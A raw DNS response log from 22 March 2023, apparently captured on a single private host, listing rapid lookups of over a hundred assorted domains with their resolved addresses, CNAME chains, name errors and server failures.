Mar 22, 2023 05:45:07.788280964 CET	8.8.8.8	192.168.2.5	0x1d88	No error (0)	rtcasey.com		69.195.90.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.865916967 CET	8.8.8.8	192.168.2.5	0xb9fa	No error (0)	www.hyabmagneter.se		172.67.209.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.865916967 CET	8.8.8.8	192.168.2.5	0xb9fa	No error (0)	www.hyabmagneter.se		104.21.69.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.947480917 CET	8.8.8.8	192.168.2.5	0x7eda	No error (0)	juso-gr.ch		172.67.163.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.947480917 CET	8.8.8.8	192.168.2.5	0x7eda	No error (0)	juso-gr.ch		104.21.50.140	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.950928926 CET	8.8.8.8	192.168.2.5	0xab3	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.950928926 CET	8.8.8.8	192.168.2.5	0xab3	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.951090097 CET	8.8.8.8	192.168.2.5	0xbc65	No error (0)	fifa-ews.com		104.21.10.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.951090097 CET	8.8.8.8	192.168.2.5	0xbc65	No error (0)	fifa-ews.com		172.67.189.227	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.984769106 CET	8.8.8.8	192.168.2.5	0x1063	No error (0)	sanfotek.net		97.74.42.79	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.984806061 CET	8.8.8.8	192.168.2.5	0xe0a	No error (0)	tozzhin.com		202.94.166.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.023443937 CET	8.8.8.8	192.168.2.5	0xd625	No error (0)	www.ex-olive.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.033987045 CET	8.8.8.8	192.168.2.5	0x7aef	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.038567066 CET	8.8.8.8	192.168.2.5	0x4440	No error (0)	msl-lock.com		165.160.15.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.038567066 CET	8.8.8.8	192.168.2.5	0x4440	No error (0)	msl-lock.com		165.160.13.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.045737982 CET	8.8.8.8	192.168.2.5	0xe4f3	No error (0)	www.hyabmagneter.se		104.21.69.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.045737982 CET	8.8.8.8	192.168.2.5	0xe4f3	No error (0)	www.hyabmagneter.se		172.67.209.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.060256004 CET	8.8.8.8	192.168.2.5	0xf169	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.088814020 CET	8.8.8.8	192.168.2.5	0x1d26	No error (0)	kavram.com		172.67.189.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.088814020 CET	8.8.8.8	192.168.2.5	0x1d26	No error (0)	kavram.com		104.21.89.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.091514111 CET	8.8.8.8	192.168.2.5	0xecd1	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.103034019 CET	8.8.8.8	192.168.2.5	0x61d7	No error (0)	lpver.com		92.204.129.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.199440002 CET	8.8.8.8	192.168.2.5	0xd101	No error (0)	dzm.cz		83.167.255.150	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.226454020 CET	8.8.8.8	192.168.2.5	0x7284	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.313373089 CET	8.8.8.8	192.168.2.5	0x9cc3	No error (0)	eos-i.com	macx1980.qy56.supcname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:08.313373089 CET	8.8.8.8	192.168.2.5	0x9cc3	No error (0)	macx1980.qy56.supcname.com	mfddos.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:08.313373089 CET	8.8.8.8	192.168.2.5	0x9cc3	No error (0)	mfddos.datacname.com	15.204.18.132.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:08.313373089 CET	8.8.8.8	192.168.2.5	0x9cc3	No error (0)	15.204.18.132.datacname.com		15.204.18.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.351865053 CET	8.8.8.8	192.168.2.5	0xc10a	No error (0)	shesfit.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.351865053 CET	8.8.8.8	192.168.2.5	0xc10a	No error (0)	shesfit.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.398271084 CET	8.8.8.8	192.168.2.5	0x88c2	No error (0)	any-s.net		108.170.12.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.414336920 CET	8.8.8.8	192.168.2.5	0xd733	No error (0)	amic.at		78.46.224.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.443900108 CET	8.8.8.8	192.168.2.5	0x6efd	No error (0)	angework.com		219.94.128.87	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.453906059 CET	8.8.8.8	192.168.2.5	0xa013	Name error (3)	www.yumgiskor.kz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.470470905 CET	8.8.8.8	192.168.2.5	0xbd20	Name error (3)	www.medisa.info	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.475002050 CET	8.8.8.8	192.168.2.5	0xe84d	No error (0)	xsui.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.479702950 CET	8.8.8.8	192.168.2.5	0xe6b	No error (0)	canasil.com		104.26.2.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.479702950 CET	8.8.8.8	192.168.2.5	0xe6b	No error (0)	canasil.com		104.26.3.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.479702950 CET	8.8.8.8	192.168.2.5	0xe6b	No error (0)	canasil.com		172.67.68.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.552337885 CET	8.8.8.8	192.168.2.5	0xe362	Name error (3)	amba-tc.si	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.589359045 CET	8.8.8.8	192.168.2.5	0xe5fe	Name error (3)	amba-tc.si	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.623033047 CET	8.8.8.8	192.168.2.5	0x3a56	Name error (3)	amba-tc.si	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.704385996 CET	8.8.8.8	192.168.2.5	0x8853	No error (0)	sokuwan.net		185.230.63.186	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.704385996 CET	8.8.8.8	192.168.2.5	0x8853	No error (0)	sokuwan.net		185.230.63.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.704385996 CET	8.8.8.8	192.168.2.5	0x8853	No error (0)	sokuwan.net		185.230.63.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.712090969 CET	8.8.8.8	192.168.2.5	0x5709	No error (0)	mikihan.com		153.126.211.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.796528101 CET	8.8.8.8	192.168.2.5	0x2f50	No error (0)	canasil.com		104.26.3.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.796528101 CET	8.8.8.8	192.168.2.5	0x2f50	No error (0)	canasil.com		104.26.2.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.796528101 CET	8.8.8.8	192.168.2.5	0x2f50	No error (0)	canasil.com		172.67.68.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.937160015 CET	8.8.8.8	192.168.2.5	0xd4d	No error (0)	kumaden.com		49.212.180.178	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.945663929 CET	8.8.8.8	192.168.2.5	0xf0d5	No error (0)	noblesse.be		5.134.4.115	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.129477978 CET	8.8.8.8	192.168.2.5	0xc99b	No error (0)	yoruksut.com		93.187.206.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.138716936 CET	8.8.8.8	192.168.2.5	0x481c	No error (0)	cnti.krsn.ru		217.74.161.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.147716045 CET	8.8.8.8	192.168.2.5	0x6a5f	No error (0)	bossinst.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.208007097 CET	8.8.8.8	192.168.2.5	0x2529	Name error (3)	www.koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.214118004 CET	8.8.8.8	192.168.2.5	0xa0a0	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.214118004 CET	8.8.8.8	192.168.2.5	0xa0a0	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.297430038 CET	8.8.8.8	192.168.2.5	0x2a79	No error (0)	cyclad.pl		87.98.236.253	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.312886953 CET	8.8.8.8	192.168.2.5	0x84a	No error (0)	johnlyon.org		141.193.213.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.339121103 CET	8.8.8.8	192.168.2.5	0x9dab	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.339121103 CET	8.8.8.8	192.168.2.5	0x9dab	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.382646084 CET	8.8.8.8	192.168.2.5	0x161b	No error (0)	sledsport.ru		185.22.232.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.415556908 CET	8.8.8.8	192.168.2.5	0x4464	No error (0)	ncn.de		46.30.60.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.430129051 CET	8.8.8.8	192.168.2.5	0xa330	No error (0)	hubbikes.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.430129051 CET	8.8.8.8	192.168.2.5	0xa330	No error (0)	hubbikes.com		99.83.190.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.480494022 CET	8.8.8.8	192.168.2.5	0x9897	No error (0)	hazmatt.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.550934076 CET	8.8.8.8	192.168.2.5	0x7a62	No error (0)	revoldia.net		45.200.235.135	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.593430042 CET	8.8.8.8	192.168.2.5	0x90e7	No error (0)	nettle.pl		195.128.140.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.673350096 CET	8.8.8.8	192.168.2.5	0x257b	No error (0)	www.usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.705888033 CET	8.8.8.8	192.168.2.5	0x4669	No error (0)	vivastay.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:09.705888033 CET	8.8.8.8	192.168.2.5	0x4669	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:09.705888033 CET	8.8.8.8	192.168.2.5	0x4669	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.705888033 CET	8.8.8.8	192.168.2.5	0x4669	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.709589958 CET	8.8.8.8	192.168.2.5	0x2528	No error (0)	tozzhin.com		202.94.166.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.857749939 CET	8.8.8.8	192.168.2.5	0xf239	No error (0)	www.synetik.net	synetik.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:09.857749939 CET	8.8.8.8	192.168.2.5	0xf239	No error (0)	synetik.net		193.166.255.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.900321007 CET	8.8.8.8	192.168.2.5	0xaef3	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.928786039 CET	8.8.8.8	192.168.2.5	0x8366	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.984245062 CET	8.8.8.8	192.168.2.5	0x45fa	No error (0)	msl-lock.com		165.160.13.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.984245062 CET	8.8.8.8	192.168.2.5	0x45fa	No error (0)	msl-lock.com		165.160.15.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.997648954 CET	8.8.8.8	192.168.2.5	0x38f9	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.058785915 CET	8.8.8.8	192.168.2.5	0x2a75	No error (0)	popbook.com		47.91.167.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.073229074 CET	8.8.8.8	192.168.2.5	0xe6b5	No error (0)	tabbles.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.073229074 CET	8.8.8.8	192.168.2.5	0xe6b5	No error (0)	tabbles.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.130867958 CET	8.8.8.8	192.168.2.5	0x8168	No error (0)	listel.co.jp		49.212.243.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.184546947 CET	8.8.8.8	192.168.2.5	0x4706	No error (0)	webways.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.184546947 CET	8.8.8.8	192.168.2.5	0x4706	No error (0)	webways.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.203751087 CET	8.8.8.8	192.168.2.5	0x31f1	Server failure (2)	someikan.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.289544106 CET	8.8.8.8	192.168.2.5	0xc629	No error (0)	x96.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.289544106 CET	8.8.8.8	192.168.2.5	0xc629	No error (0)	x96.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.300007105 CET	8.8.8.8	192.168.2.5	0xe5c	No error (0)	simetar.com		104.21.79.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.300007105 CET	8.8.8.8	192.168.2.5	0xe5c	No error (0)	simetar.com		172.67.146.154	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.321059942 CET	8.8.8.8	192.168.2.5	0xf2a1	No error (0)	atbauk.org		104.21.92.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.321059942 CET	8.8.8.8	192.168.2.5	0xf2a1	No error (0)	atbauk.org		172.67.196.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.321095943 CET	8.8.8.8	192.168.2.5	0xe67f	No error (0)	vfcindia.com		68.71.135.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.321867943 CET	8.8.8.8	192.168.2.5	0xdaa4	Name error (3)	cvswl.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.350970030 CET	8.8.8.8	192.168.2.5	0xcead	No error (0)	amerifor.com		64.18.191.61	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.364074945 CET	8.8.8.8	192.168.2.5	0x2978	No error (0)	canasil.com		104.26.2.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.364074945 CET	8.8.8.8	192.168.2.5	0x2978	No error (0)	canasil.com		104.26.3.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.364074945 CET	8.8.8.8	192.168.2.5	0x2978	No error (0)	canasil.com		172.67.68.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.453324080 CET	8.8.8.8	192.168.2.5	0x774a	Name error (3)	cvswl.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.799586058 CET	8.8.8.8	192.168.2.5	0x244b	Server failure (2)	someikan.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.878418922 CET	8.8.8.8	192.168.2.5	0x2feb	No error (0)	wnit.org		38.111.255.201	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.898466110 CET	8.8.8.8	192.168.2.5	0xab23	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.921675920 CET	8.8.8.8	192.168.2.5	0x953c	Name error (3)	cvswl.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.939085007 CET	8.8.8.8	192.168.2.5	0xe7ea	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.958338976 CET	8.8.8.8	192.168.2.5	0x3fa	No error (0)	ifesnet.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.958338976 CET	8.8.8.8	192.168.2.5	0x3fa	No error (0)	ifesnet.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.962224960 CET	8.8.8.8	192.168.2.5	0x7211	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.975168943 CET	8.8.8.8	192.168.2.5	0xa0ce	No error (0)	gcss.com		35.186.238.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.980942011 CET	8.8.8.8	192.168.2.5	0x1fc8	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.993366003 CET	8.8.8.8	192.168.2.5	0x753	No error (0)	pcoyuncu.com		213.142.131.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.993386984 CET	8.8.8.8	192.168.2.5	0xd6f	No error (0)	bible.org		104.20.54.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.993386984 CET	8.8.8.8	192.168.2.5	0xd6f	No error (0)	bible.org		172.67.33.95	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.993386984 CET	8.8.8.8	192.168.2.5	0xd6f	No error (0)	bible.org		104.20.55.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.000603914 CET	8.8.8.8	192.168.2.5	0x1019	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.010021925 CET	8.8.8.8	192.168.2.5	0x4d6c	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.010021925 CET	8.8.8.8	192.168.2.5	0x4d6c	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.028609037 CET	8.8.8.8	192.168.2.5	0xb1db	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.045187950 CET	8.8.8.8	192.168.2.5	0x7f4d	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.062230110 CET	8.8.8.8	192.168.2.5	0xf7f2	No error (0)	kavram.com		172.67.189.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.062230110 CET	8.8.8.8	192.168.2.5	0xf7f2	No error (0)	kavram.com		104.21.89.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.191570044 CET	8.8.8.8	192.168.2.5	0xf926	No error (0)	isom.org		192.124.249.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.219531059 CET	8.8.8.8	192.168.2.5	0x26bc	No error (0)	htsmx.net		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.326699018 CET	8.8.8.8	192.168.2.5	0x7d2e	No error (0)	workplus.hu		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.326699018 CET	8.8.8.8	192.168.2.5	0x7d2e	No error (0)	workplus.hu		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.422341108 CET	8.8.8.8	192.168.2.5	0xa25b	Server failure (2)	someikan.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.535537004 CET	8.8.8.8	192.168.2.5	0x4032	No error (0)	okashimo.com		203.137.75.45	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.955254078 CET	8.8.8.8	192.168.2.5	0x6ff2	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.467080116 CET	8.8.8.8	192.168.2.5	0xd135	No error (0)	smtp.live.com	a-0010.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:12.472501993 CET	8.8.8.8	192.168.2.5	0x9970	No error (0)	web-york.com		219.94.129.97	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.489442110 CET	8.8.8.8	192.168.2.5	0xd8e5	No error (0)	ikulani.com		157.7.107.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.667958975 CET	8.8.8.8	192.168.2.5	0xa91e	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.669857025 CET	8.8.8.8	192.168.2.5	0x5907	No error (0)	yasuma.com		61.200.81.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.787259102 CET	8.8.8.8	192.168.2.5	0x6e5	No error (0)	kamptal.at		128.204.134.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.792141914 CET	8.8.8.8	192.168.2.5	0xdb13	No error (0)	fifa-ews.com		104.21.10.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.792141914 CET	8.8.8.8	192.168.2.5	0xdb13	No error (0)	fifa-ews.com		172.67.189.227	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.804425955 CET	8.8.8.8	192.168.2.5	0xc2ec	No error (0)	fdlymca.org		192.124.249.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.866167068 CET	8.8.8.8	192.168.2.5	0xff9d	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.917259932 CET	8.8.8.8	192.168.2.5	0x93cb	No error (0)	cubodown.com		172.67.150.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.917259932 CET	8.8.8.8	192.168.2.5	0x93cb	No error (0)	cubodown.com		104.21.30.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.921344042 CET	8.8.8.8	192.168.2.5	0xbd07	No error (0)	rokoron.com		211.13.204.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.926220894 CET	8.8.8.8	192.168.2.5	0xbda9	No error (0)	doggybag.org		213.186.33.16	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.926378965 CET	8.8.8.8	192.168.2.5	0xa2f3	No error (0)	ludomemo.com		27.0.174.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.932710886 CET	8.8.8.8	192.168.2.5	0x6ff2	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.932923079 CET	8.8.8.8	192.168.2.5	0x4ad3	No error (0)	scintel.com		23.239.201.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.933612108 CET	8.8.8.8	192.168.2.5	0xd1db	No error (0)	mjrcpas.com		154.81.136.239	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.947578907 CET	8.8.8.8	192.168.2.5	0x1093	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.947578907 CET	8.8.8.8	192.168.2.5	0x1093	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.949214935 CET	8.8.8.8	192.168.2.5	0xb117	No error (0)	likangds.com		23.225.40.19	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.951540947 CET	8.8.8.8	192.168.2.5	0xcc77	No error (0)	ikulani.com		157.7.107.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.957427979 CET	8.8.8.8	192.168.2.5	0x9518	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.966887951 CET	8.8.8.8	192.168.2.5	0x44a9	No error (0)	biurohera.pl		79.96.161.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.966887951 CET	8.8.8.8	192.168.2.5	0x44a9	No error (0)	biurohera.pl		54.36.175.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.990758896 CET	8.8.8.8	192.168.2.5	0x1078	No error (0)	nblewis.com		35.168.185.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.990758896 CET	8.8.8.8	192.168.2.5	0x1078	No error (0)	nblewis.com		35.169.15.168	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.990758896 CET	8.8.8.8	192.168.2.5	0x1078	No error (0)	nblewis.com		52.0.29.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.992223024 CET	8.8.8.8	192.168.2.5	0xd174	No error (0)	notis.ru		185.178.208.141	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.993828058 CET	8.8.8.8	192.168.2.5	0x1cf2	No error (0)	106west.com		148.130.4.196	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.003720045 CET	8.8.8.8	192.168.2.5	0x80e4	No error (0)	deckoviny.cz		88.86.118.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.006475925 CET	8.8.8.8	192.168.2.5	0xf253	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.007853031 CET	8.8.8.8	192.168.2.5	0x4f0	No error (0)	shanks.co.uk		217.19.254.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.008961916 CET	8.8.8.8	192.168.2.5	0x8f9	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.014276981 CET	8.8.8.8	192.168.2.5	0x92d6	No error (0)	www.ex-olive.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.033437014 CET	8.8.8.8	192.168.2.5	0x3099	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.051981926 CET	8.8.8.8	192.168.2.5	0xfbd5	No error (0)	oaith.ca		192.124.249.12	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.056849957 CET	8.8.8.8	192.168.2.5	0x2492	No error (0)	com-edit.fr		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.072388887 CET	8.8.8.8	192.168.2.5	0x29a1	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.080444098 CET	8.8.8.8	192.168.2.5	0xda5	No error (0)	iranytu.net		103.224.212.222	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.091989040 CET	8.8.8.8	192.168.2.5	0x73fc	No error (0)	e-kami.net		202.172.28.89	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.154808998 CET	8.8.8.8	192.168.2.5	0xcbc0	No error (0)	www.wnsavoy.com		96.91.204.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.273468971 CET	8.8.8.8	192.168.2.5	0x56df	No error (0)	ruzee.com		207.180.198.201	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.360877037 CET	8.8.8.8	192.168.2.5	0x88ed	No error (0)	jsaps.com		49.212.235.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.487540007 CET	8.8.8.8	192.168.2.5	0x6050	No error (0)	karila.fr		89.107.169.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.675959110 CET	8.8.8.8	192.168.2.5	0x2a1a	No error (0)	araax.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:13.675959110 CET	8.8.8.8	192.168.2.5	0x2a1a	No error (0)	traff-6.hugedomains.com	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
